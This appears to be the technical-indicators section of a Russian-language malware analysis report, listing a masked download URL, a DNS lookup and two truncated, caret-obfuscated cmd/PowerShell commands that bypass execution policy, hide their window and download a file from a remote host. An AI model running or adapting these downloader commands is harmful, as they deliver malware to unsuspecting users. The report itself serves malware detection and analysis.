Техническая информация
- http://ho####wergop.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWErsHEl^L^.^E^XE^ -^E^x^EcU^t^I^on^po^l^Ic^Y^ ^ByP^as^S ^-^nopR^ofiLe^ ^-^w^InDowStYl^E HidDen (ne^W^-oB^J^Ec^T^ ^S^ysTE^m.n^E^T.^w^EBc^LI^En^T^)^.D^OWnLoAd^f^Ile('http:/...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "POWErsHEl^L^.^E^XE^ -^E^x^EcU^t^I^on^po^l^Ic^Y^ ^ByP^as^S ^-^nopR^ofiLe^ ^-^w^InDowStYl^E HidDen (ne^W^-oB^J^Ec^T^ ^S^ysTE^m.n^E^T.^w^EBc^LI^En^T^)^.D^OWnLoAd^f^Ile('http:/...' (со скрытым окном)